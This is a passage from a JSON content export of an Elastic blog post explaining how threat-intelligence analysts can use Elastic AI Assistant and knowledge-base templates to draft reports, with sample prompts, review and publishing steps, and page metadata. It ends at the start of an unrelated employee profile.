12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0ab67850a26cd6f1"}}},{"image":{"image":{"uid":"bltb778764f0f67fb2c","_version":1,"title":"image12.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-05T14:03:14.981Z","updated_at":"2024-12-05T14:03:14.981Z","content_type":"image/png","file_size":"19188","filename":"image12.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-05T14:50:44.271Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb778764f0f67fb2c/6751b2a261dcb523003f29d2/image12.png"},"_metadata":{"uid":"csab7ac1420ea9fb0c"},"caption_l10n":"","alt_text_l10n":"document dropdown","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-medium: 50%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs209cdf28b3765152"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eClicking \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDocument\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e will give you a new panel where you can directly add information to the KB. You’ll need to give the KB entry a few specific pieces of information:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eName\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSharing (permissions)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMarkdown text\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRequired knowledge\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs02d5c37b674ffc33"}}},{"image":{"image":{"uid":"bltfa163c3efa42eb55","_version":1,"title":"image2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-05T14:03:30.999Z","updated_at":"2024-12-05T14:03:30.999Z","content_type":"image/png","file_size":"205611","filename":"image2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-05T14:50:44.247Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfa163c3efa42eb55/6751b2b3c15d2bfaf342a1b6/image2.png"},"_metadata":{"uid":"csbdb6e90c7510ca44"},"caption_l10n":"","alt_text_l10n":"new document entry","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs6f3dd5e83c282ad7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe name is the title that the KB will use in order to reference the item. So, in our case, it’s something along the lines of “Threat Report Template: TTR.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSharing allows us to specify who will have access to the KB item with many available options depending on the individual setup and situation (\u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/ai-assistant-knowledge-base.html\"\u003e\u003cspan style='font-size: 12pt;'\u003emore information about KB permissions here\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e). For this example, I’ve allowed everyone who has access to the space to be able to view this KB item.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Markdown text field is where we’re going to paste our Markdown template we previously created.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe last step is to check the box that says “Required knowledge” — this will let the assistant use these templates to produce reporting without specific prompting. It is possible to leave this unchecked, but prompts asking for reports will need to specify that content should be retrieved from the knowledge base. After you’ve checked the box, click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSave\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce you save the KB item, you should see a list of all of your KB items under\u0026nbsp;Security AI settings \u0026gt; Knowledge Base.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0b3d390e0948d1f5"}}},{"image":{"image":{"uid":"blt202e45ca919c75f6","_version":1,"title":"image4.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-05T14:03:57.585Z","updated_at":"2024-12-05T14:03:57.585Z","content_type":"image/png","file_size":"131744","filename":"image4.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-05T14:50:44.349Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt202e45ca919c75f6/6751b2cd842148bd19259741/image4.png"},"_metadata":{"uid":"csdbf955d9ae8254a8"},"caption_l10n":"","alt_text_l10n":"security ai settings","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc88077f7790d820e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eYou can also delete or edit these items from here if you need to make any changes.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe original method to store items in the KB was to tell the Elastic AI Assistant to do it directly. For example:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eUse the following prompt to store the template: \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003eStore the following Markdown template in the knowledge base: \u0026lt;insert Markdown template here\u0026gt;\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs97660dd6c7d08c77"}}},{"image":{"image":{"uid":"bltf6353715d3280ed6","_version":1,"title":"image13.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-05T14:04:18.112Z","updated_at":"2024-12-05T14:04:18.112Z","content_type":"image/png","file_size":"323604","filename":"image13.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-05T14:50:44.425Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf6353715d3280ed6/6751b2e239a25bfad4a8a91b/image13.png"},"_metadata":{"uid":"cs76012783ddb2b0c0"},"caption_l10n":"","alt_text_l10n":"prompt to Store the following Markdown template in the knowledge base","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs84f04773822da6a6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow, the fun part begins!\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e\u003cstrong\u003e3. Verify Storage: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003eConfirm that the template has been successfully stored by querying the knowledge base. Try this prompt: \u003c/span\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eShow me the TTR Threat Report Template stored in your knowledge base.\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003eThe Elastic AI Assistant should return a message showing you the template without any information filled in:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd8565a7ad719aa74"}}},{"image":{"image":{"uid":"bltfec76f499be6b205","_version":1,"title":"image1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-05T14:04:40.597Z","updated_at":"2024-12-05T14:04:40.597Z","content_type":"image/png","file_size":"324165","filename":"image1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-05T14:50:44.461Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfec76f499be6b205/6751b2f861dcb5172f3f29dd/image1.png"},"_metadata":{"uid":"cs9bb2b0b9f214cb13"},"caption_l10n":"","alt_text_l10n":"intelligence trend report","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"4. Develop a method for gathering threat reporting and data","_metadata":{"uid":"csdf1919744b774d97"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEstablish a systematic approach for gathering threat intelligence data from various sources, such as threat feeds, security blogs, and incident reports. This ensures that the data is comprehensive and up to date. This will vary greatly from program to program and be at least slightly dependent on the sources available. There are several methods that work well for this from manually scanning news sites to automating the process through RSS feeds or even ingesting threat reporting into a threat intelligence platform (TIP.)\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt the end of the day, as long as there is a process for gathering open source reporting and other threat data, it will work for these workflows. At Elastic, we have a process that uses RSS feeds to aggregate open source reporting and threat data to one place where it can all be used systematically (be on the lookout for another blog coming soon on how we’re doing this!).\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHaving a defined process for collecting this information adds efficiency to the process and allows for a number of interesting analysis opportunities relevant to the external threat landscape.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"5. Feed threat data to Elastic AI Assistant for the appropriate templates","_metadata":{"uid":"cs0f4b56c23137a59d"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe next step is to feed the information from the specific threat articles being analyzed to the Elastic AI Assistant — either manually or in an automated fashion (\u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-ai-assistant-custom-knowledge-sources\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003echeck out these examples for inspiration\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e). This is where the magic happens. The prompt should look something like this:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003e“Using the \u0026lt;template name\u0026gt; template stored in your knowledge base, analyze the following information and create a new \u0026lt;report type\u0026gt; report from the information.\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e”\u003c/span\u003e\u003c/p\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc96c7aef90180cb4"}}},{"callout":{"title_l10n":"","_metadata":{"uid":"csb2bc4449484656d1"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNote:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The words “stored in your knowledge base” aren’t needed unless the knowledge was submitted as “not required.”\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa32a5016cc38b5c9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFeel free to get more granular with the prompts as well, such as telling the AI Assistant to leave fields blank if the relevant information isn’t present in the data provided. For example purposes, we’re using a report published by Elastic Security Labs on the XZ / liblzma backdoor, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security-labs/500ms-to-midnight\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e500ms to midnight: XZ / liblzma backdoor.\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4d713bb59feae48f"}}},{"image":{"image":{"uid":"blt00b703cf1ac9fe34","_version":1,"title":"image9.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-05T14:05:01.606Z","updated_at":"2024-12-05T14:05:01.606Z","content_type":"image/png","file_size":"417139","filename":"image9.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-05T14:50:44.297Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt00b703cf1ac9fe34/6751b30dc174bfbc4a645414/image9.png"},"_metadata":{"uid":"cs554bfbcdbf5c60f4"},"caption_l10n":"","alt_text_l10n":"Elastic Security Labs on the XZ / liblzma backdoor, 500ms to midnight: XZ / liblzma backdoor","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs6a8d37869630f434"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe assistant will then populate your template with the information from the threat data you’ve provided.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csac54c4754964c0e0"}}},{"image":{"image":{"uid":"bltf442c78fd730c4e9","_version":1,"title":"image3.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-05T14:05:18.691Z","updated_at":"2024-12-05T14:05:18.691Z","content_type":"image/png","file_size":"384091","filename":"image3.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-05T14:50:44.478Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf442c78fd730c4e9/6751b31e87be7149ed89ff90/image3.png"},"_metadata":{"uid":"cs3f04a4f0ac19dd79"},"caption_l10n":"","alt_text_l10n":"INTREP Report executive summary","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"6. Provide additional context or data","_metadata":{"uid":"cs34ebfd7dc5c67a76"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhat if we’ve got multiple reports or data sources about the same event and want to include information from all of them? Elastic AI Assistant can handle that as well. Simply repeat the process in the same AI Assistant chat with the additional information. Try this as a prompt:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003e“That looks good. Please include this information as well: \u0026lt;insert additional reporting source or data\u0026gt;”\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant will then take the additional information and incorporate it into the same templated report it previously provided.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs44891b4c3ac9e36d"}}},{"image":{"image":{"uid":"blt529014e0527677bd","_version":1,"title":"image8.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-05T14:05:26.249Z","updated_at":"2024-12-05T14:05:26.249Z","content_type":"image/png","file_size":"436970","filename":"image8.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-05T14:50:44.375Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt529014e0527677bd/6751b32690b46f8b7c517cf8/image8.png"},"_metadata":{"uid":"csa527eb1b77734e04"},"caption_l10n":"","alt_text_l10n":"INTREP reeport","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs6c4c9b272c905e21"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis can be done with multiple reports and data sources and is a great way to include insights from different sources and perspectives without duplicating information.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"7. Analyze the threat data within the report template for accuracy and understanding","_metadata":{"uid":"csb3ffacb6e91e8ff5"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce the template is populated, analysts review the report to ensure its accuracy and comprehensiveness. This step is crucial for maintaining the integrity of the report. Elastic AI Assistant is great at gathering data and putting it into the correct format and sections, but it is not perfect and 100% accuracy cannot be guaranteed.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eReading through the report carefully in its current state ensures that the information provided has been correctly formatted to the template, while also giving the analyst an opportunity to gain better understanding of the topic and begin analysis.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"8. Provide relevance, impact, and any recommendations","_metadata":{"uid":"csa6bd24780e2d858d"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs efficient and smart as Elastic AI Assistant is, there are certain things that are just not meant to be done by a machine. And that’s where the value of a good analyst comes in. The analyst should have a solid understanding of the environment, organization, and technical factors that are relevant to the event being analyzed.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt this point, analysts will need to add their insights on the relevance, potential impact, and recommendations based on the threat data. This step uses the expertise of the analysts to provide actionable intelligence. Essentially, this is the step of taking threat data and turning it into something that is useful for internal stakeholders of the organization.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"9. Prepage, review, and publish the report","_metadata":{"uid":"cs9d9154fd0450a53e"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow that most or all of the analysis is complete, it's time to put the report into a presentable format. This will differ greatly from program to program, depending on the methods used for dissemination and style guidelines. At Elastic, we take the report in Markdown format and import it into Google Docs for stylistic edits like adding pictures and formatting. But for other programs, this could be accomplished in basically any platform that the analyst would normally use to write and prepare reports. The important part is that the information has been gathered, analyzed, and put into a template that can be easily moved into another platform for publication.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce the report has been drafted, this is it — the moment we’ve all been waiting for. It’s time to give the report one (or many) final read throughs, fix any formatting issues, add a good picture or two, and publish! The workflows for review and dissemination will be unique to each individual threat intelligence program and will likely need to take several things into account:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eWho is this going to?\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Which individual stakeholders or teams would benefit from this report?\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eWhere should it live?\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e What location would be best for the audience to ingest the report? Is it a messaging platform, a wiki page, an email blast, or somewhere else?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eWhen should it be sent?\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Timing is everything, especially when publishing to centralized locations. Consider things like time zones, working hours, and vacation schedules when deciding when to publish and disseminate. Criticality of the information will also need to be taken into account to ensure that the report is still valuable when it’s received. It can definitely be a balancing act but should be considered when it’s time to publish.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAre there any metrics to collect that can help drive the intelligence program forward?\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Many programs disseminate reporting and end the process there. Understanding what happens to a report after it’s been published can be a great value to a threat intelligence program. Who’s been reading the reports? How often do they read it? How quickly are the reports read once they’ve been published? The answers to all of these questions can help shape future reporting, dissemination workflows, and other aspects of the entire process to produce a better product.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt Elastic, we use the logging already available for our dissemination channels (messaging platforms, shared drives, and wiki pages) to produce dashboards that show things like engagement rates, follow-up activities, and other metrics about reports we produce. By understanding which reports are being read more or less often, we can tailor the analysis conducted to the topics and threats that stakeholders are reading and using.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic AI Assistant enhances efficiency and effectiveness ","_metadata":{"uid":"cs976f64e3421ca4f6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant offers a powerful tool for enhancing threat intelligence reporting. By following these steps, analysts can produce high-quality reports more efficiently. This approach not only saves time but also ensures that threat intel reports are thorough and consistent. While Elastic AI Assistant aids in the reporting process, the expertise and insights of threat analysts remain irreplaceable — making this a valuable tool for enhancing their efficiency and effectiveness without losing the insights and knowledge gained from the threat analyst.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWant to try Elastic AI Assistant for yourself? \u003c/span\u003e\u003ca href=\"https://www.elastic.co/cloud/cloud-trial-overview\"\u003e\u003cspan style='font-size: 12pt;'\u003eDownload our free version\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and streamline threat intelligence report creation!\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs213acc16bfd1ac67"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3573b48b7a51a316"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8383ee0c8ba7c6aa"}}}],"publish_date":"2024-12-05","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Giving valuable time back to threat intel analysts","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt43ad419de732b584","ACL":{},"created_at":"2023-11-06T21:31:46.367Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-analytics","label_l10n":"Security analytics","tags":[],"title":"Security analytics","updated_at":"2023-11-06T21:31:46.367Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.534Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Automated threat protection","label_l10n":"Automated threat protection","keyword":"automated-threat-protection","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt49e356fcb7971aca","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:22.822Z","updated_at":"2023-11-06T20:08:22.822Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:37.794Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt93a59f0c34ea418e","_version":1,"title":"03-strobes (1) (2).jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-05T13:54:05.468Z","updated_at":"2024-12-05T13:54:05.468Z","content_type":"image/jpeg","file_size":"178155","filename":"03-strobes_(1)_(2).jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-05T14:50:44.224Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt93a59f0c34ea418e/6751b07d8dd14393ce1ea32a/03-strobes_(1)_(2).jpg"},"title":"Streamlining threat intelligence reporting with Elastic AI Assistant","title_l10n":"Streamlining threat intelligence reporting with Elastic AI Assistant","updated_at":"2024-12-05T14:36:42.606Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-ai-assistant-threat-intelligence-reporting","publish_details":{"time":"2024-12-05T14:50:43.729Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt2e135b6277ea349c","_version":1,"locale":"en-us","ACL":{},"abstract_l10n":"Ishleen’s older brother worked in tech, fueling her interest in computer science. However, it wasn’t until she started her first job in the networking domain that she truly understood the impact her work in tech could have.","author":["blt7fc3768df8cad1f6"],"category":["bltc253e0851420b088"],"created_at":"2024-12-04T20:45:48.348Z","created_by":"blte369ea3bcd6ac892","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIshleen Kaur was always interested in the mechanisms behind how things worked and wanted to solve problems that impacted people’s day-to-day lives. Originally, she was torn between pursuing medicine and engineering, but the latter won out.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen she was 